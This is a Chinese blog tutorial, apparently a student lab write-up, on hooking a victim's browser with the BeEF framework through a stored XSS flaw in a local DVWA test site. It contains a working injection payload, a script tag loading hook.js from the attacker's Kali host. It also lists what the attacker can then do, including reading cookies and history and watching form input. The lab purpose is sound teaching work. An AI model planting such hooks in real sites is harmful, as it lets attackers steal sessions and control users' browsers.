利用BeEF执行XSS攻击

已于 2023-06-26 16:37:36 修改
阅读量390 收藏 2
点赞数
文章标签: xss
于 2023-05-31 19:39:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70185580/article/details/130975829
版权

文章目录

前言

XSS攻击(Cross-Site Scripting)是指攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。BeEF是一种利用浏览器漏洞的攻击工具,可以在浏览器端运行恶意脚本。

本文将介绍如何利用BeEF执行XSS攻击。

一:安装BeEF

首先,需要在Kali Linux上安装BeEF。在终端中输入以下命令以root用户):

apt-get update
apt-get install beef-xss

安装完成后,在终端中输入以下命令启动BeEF:

cd /usr/share/beef-xss(切换到beef-xss目录中来打开beef,以实际安装路径为主)

./beef
在这里插入图片描述

然后,在浏览器中输入http://127.0.0.1:3000/ui/panel来访问BeEF的控制面板。
在这里插入图片描述
可以通过查看etc/beef-xss/config.yaml文件来知道用户名和密码

在这里插入图片描述
成功进入beef主页面
在这里插入图片描述

二:配置靶机环境

实验靶机:Windows7 64位
*

1.访问https://www.xp.cn/,下载phpstudy软件(下载最新版的就可以)

在这里插入图片描述

2.安装好后启动PHPstudy,点击启动Apache服务与MySQL服务进行测试

在这里插入图片描述

3.在浏览器访问127.0.0.1或者localhost,出现“站点创建成功”,则phpstudy安装成功

在这里插入图片描述

4.访问https://github.com/ethicalhack3r/DVWA,下载压缩包

在这里插入图片描述

5.将解压后的DVWA文件夹放到phpstudy安装目录下

在这里插入图片描述

6.进入DVWA文件夹,将文件config.inc.php.dist复制为一个副本,将副本修改为config.inc.php,双击从记事本里面打开。

在这里插入图片描述

7.打开config.inc.php文件后,将文件中的db_user db_password,分别修改为root,root

在这里插入图片描述

8.保持phpstudy开启状态,在浏览器中输入网址:http://127.0.0.1/DVWA-master,进入配置安装界面,点击Setup/Reset DB

在这里插入图片描述

9.第一次安装可能在方框内会出现标红,下面依次解决: 打开dvwa下面的config.inc.php文件,在文件里面找到这两串代码

在这里插入图片描述
将这两串key输入进去

public: 6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb
private:6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K

10.在phpstudy的安装目录中,找到php.ini文件

在这里插入图片描述

11.将allow_url_fopen和allow_url_include的值改为On

在这里插入图片描述

12.最后重启一下phpstudy中的Apache与mysql服务

再次访问http://127.0.0.1/DVWA-maste中的设置,你可以发现都正常了,可能会跳转到登陆页面,那就说明安装成功,输入账号和密码:DVWA的默认账号和默认密码分别是:admin 和 password*

三: 利用DOM XSS案例

(1)将win7靶机中的DWVA难度调为low

在这里插入图片描述
*

(2)在XSS(Stored)下输入脚本命令

Name:ceshi(自己取一个名字)
Message:*

<script src="http://192.xxx.xxx.xxx(自己的kaliIP地址):3000/hook.js"></script>

在这里插入图片描述

(3)点击Sign Guestbook,kali那边Beef就勾上了靶机所在的浏览器了

在这里插入图片描述

四:控制受害者的浏览器

当攻击成功后,可以在BeEF的控制面板中查看受害者的浏览器信息,并控制其浏览器。可以进行以下操作:

  1. 查看受害者的浏览器历史记录和Cookie信息。
  2. 监听受害者的浏览器行为,如点击链接、填写表单等。
  3. 控制受害者的浏览器,比如打开页面、关闭页面等。

五:总结

通过使用BeEF可以轻松地进行XSS攻击,并控制受害者的浏览器。因此,为了保护自己的网站和个人隐私,我们应该加强对XSS攻击的防范。

21计算机网络技术1班蓝军
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web应用安全:XSS通过JavaScript攻击(实验).docx
06-20
XSS通过JavaScript攻击 一、实验目的 了解XSS的有关知识; 了解XSS通过JavaScript实际操作; 了解XSS的攻击原理。 二、实验内容 在Kali上安装beef-xss工具; 在站点上进行XSS JavaScript攻击。 (附加题)使用beef尝试更多XSS JavaScript功能。 三、实验内容与步骤 在Kali上安装beef-xss工具: 1.1、首先打开Kali,将kali的下载源换成国内中科大的源,在root权限下输入命令:vim /etc/apt/sources.list打开apt源。 1.2、然后可以将所有内容都删掉或者注释掉,然后输入两行内容,然后保存退出,输入时点击a,然后开始输入,输入结束后点击Esc然后输入wq按回车实现保存退出。 deb /kali kali-rolling main non-free contrib deb-src /kali kali-rolling main non-free contrib 1.3、输入命令:apt-get update,更新apt。 1.4、然后再命令行输入:sudo apt-get instal
使用Beef劫持客户端浏览器并进一步使用Beef+msf拿客户端shell
热门推荐
MickeyMouse1928的博客
04-08 2万+
利用Beef劫持客户端浏览器   环境: 1.Kali(使用beef生成恶意代码,IP:192.168.114.140) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.114.204) 3. 客户端(用于访问web服务器,IP:192.168.114.130) 步骤: 1. Kali使用beef生成恶意代码 2. 将恶意代码写入192.168.114.2
beef-xss详细教程(一文带你学会beef) - Kali下安装beef - beef-xss反射型,储存型利用 - beef实现Cookie会话劫持 - 键盘监听 - 浏览器弹窗,重定向等
最新发布
A_991128a的博客
02-21 1615
✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆🔥系列专栏 :XSS漏洞应用-Beef💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。
kali-beef攻击浏览器-运维安全详细笔记总结
06-30
kali-beef攻击浏览器-运维安全详细笔记总结
vasp.5.4.4&beef-src.tar.xz
03-20
VASP+BEEF beef-vdW全称为Bayesian error estimation functional with van der Waals correlation, 是DTU在2012年出来的一个新泛函,目前和Quantum Espresso,VASP,GPAW均有接口。具体的编译过程可以参考SUNCAT - Software和 BEEF Functional Software。 把beef编译到VASP里,首先要编译libbeef 1 编译和安装BEEF $ cd libbeef $ chmod +x configure $ ./configure CC=mpicc --prefix=/opt/software/beef $ make $ make install 2 修改VASP makefile.include makefile.include需要稍作修改(CPP_OPTIONS里添加-Dlibbeeef,LLIBS里添加-Lpathtolibbeef -lbeef) CPP_OPTIONS= -DMPI -DHOST=\"IFC91_ompi\" -DIFC \ -DCACHE_SIZE=4000 -DPGF90 -Davoidalloc \ -DMPI_BLOCK=8000 -DscaLAPACK -Duse_collective \ -DnoAugXCmeta -Duse_bse_te \ -Duse_shmem -Dtbdyn -Dlibbeef ...... BEEF = -L/opt/software/beef/lib -lbeef ...... LLIBS = $(SCALAPACK) $(LAPACK) $(BLAS) $(BEEF) ...... 3 编译VASP $ make
Metasploit+beef攻击实验
10-12
BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。
利用 BeEF 执行 XSS 攻击的总结
weixin_71139244的博客
05-27 935
跨站脚本攻击,简称XSS,是一种网站应用程序的安全漏洞攻击,属于代码注入的一种;与其他攻击相比,XSS攻击所带来的危害更大。跨站脚本攻击XSS,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。
BeEF-XSS详细使用教程
一个懒鬼的博客
05-10 6346
BeEF-XSS简介 BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 启动BeFF-XSS 关于kali没有安装beef可以参考下图: BeEF-XSS管理登录页面 用户名默认为beef,密码在首次启动beef-xss时需要手动设置。(启动beef-xss会自动打开浏览器) BeEF-XSS主页面介绍 Hocked Browers online browers 在线浏览器 offline browers 离线浏览..
跨站脚本攻击xss利用-beef攻击-演示
jklbnm12的博客
02-09 1000
0x0环境 主机A win10:10.51.20.60(wifi) 主机A中的虚拟机kali(攻击者):192.168.110.129(NAT) 主机A中的虚拟机win2003(受害者):192.168.110.132(NAT) 0x1 配置 0x11 beef配置 Beef的配置文件在 /usr/share/beef-xss/config.yaml Host:kali IP Port:beef监听端口默认3000 public:主机A(接入外网的电脑IP) public_port:主机A中空闲的端口,我
浅谈一下xss工具----beef
划水的小白白
05-07 3448
今天主要聊一下,从认识xss的危害到beef-xss利用 beef是一个类似与sql注入的sqlmap一样,也是一种工具。 一、xss简介 定义: 跨站脚本攻击。xss是一种在web应用中的计算机安全漏洞, 它允许web用户将一些恶意代码植入到提供给其它用户使用的页面中 种类: 反射型xss: 提交得数据成功的实现了xss,但是仅仅是对你这次访问产生了影响,...
XSS漏洞利用工具BeEF
RockHan
11-06 288
BeEF是Browser Exploitation Framework的缩写。随着人们越来越多地关注针对包括移动客户端在内的客户端的网络传播攻击,BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了硬化的网络边界和客户端系统,并在一个门户开放的环境中检查可利用性。BeEF将钩挂一个或多个Web浏览器,并将其用作启动定向命令模块的滩头堡,...
beef插件翻译.docx
12-09
beef插件翻译
raylib-beef:用于Beef编程语言的raylib绑定
05-06
雷利比牛肉raylib-beef是Raylib 3.1 dev的Beef包装器库,这是一个简单易用的库。 结合Beef编程语言的优势,制作游戏绝对令人满足! 注意力! 这种绑定仍在开发中。 可能会发生错误。 二进制文件已从存储库中删除。 ...
linux-kali利用BeEF 执行 XSS 攻击
LCH14777475118的博客
06-26 266
文件,在文件里面找到这两串代码。软件(下载最新版的就可以),复制为一个副本,将副本修改为。安装目录中启动它(注意:新的。软件可以用来进行站点搭建。就勾上了靶机所在的浏览器了。,双击从记事本里面打开。,或者可以在配置文件。
Kali beef-xss实现Xss详细教程。
sunwanfulove的博客
09-28 3272
Kali beef-xss实现Xss详细教程。
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
Martin-share的博客
02-12 8854
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
搭建XSS平台——XSS工具的利用
cxrpty的博客
02-24 2372
实验一:kali下的BeEF 实验环境:kali、DVWA 实验步骤: 1、打开kali的命令行,输入:beef-xs,获得一个js脚本,并跳出beef登录界面,输入用户名和密码(默认都是beef) 2、输入ifconfig查看ip,复制js代码,并将ip改为本机ip,此时js代码如下: <script src="http://192.168.1.106:3000/hook....
beef利用xss漏洞实现攻击
m0_61506558的博客
08-22 1096
beef是一个XSS平台,有非常多的功能Exploit 模块用的最多,但初学者用Browser就足够了Beef-XSS平台基本使用 https://www.bilibili.com/video/av92711691/
启动BeEF。在攻击机启动BeEF。命令如下: #beef-xss
06-11
BeEF是一款用于Web浏览器的渗透测试工具,它可以帮助安全测试人员测试Web应用程序的安全性,包括漏洞检测、渗透测试、攻击载荷等。启动BeEF需要在攻击机上运行beef-xss命令。您可以按照以下步骤启动BeEF: 1. 打开终端 2. 输入命令:beef-xss 3. 回车键运行命令 4. 等待BeEF启动完毕,此时终端会输出BeEF的Web界面URL地址 5. 打开浏览器,输入BeEF的Web界面URL地址,进入BeEF的管理界面 请注意,BeEF是一款强大的工具,使用时需要谨慎,切勿用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值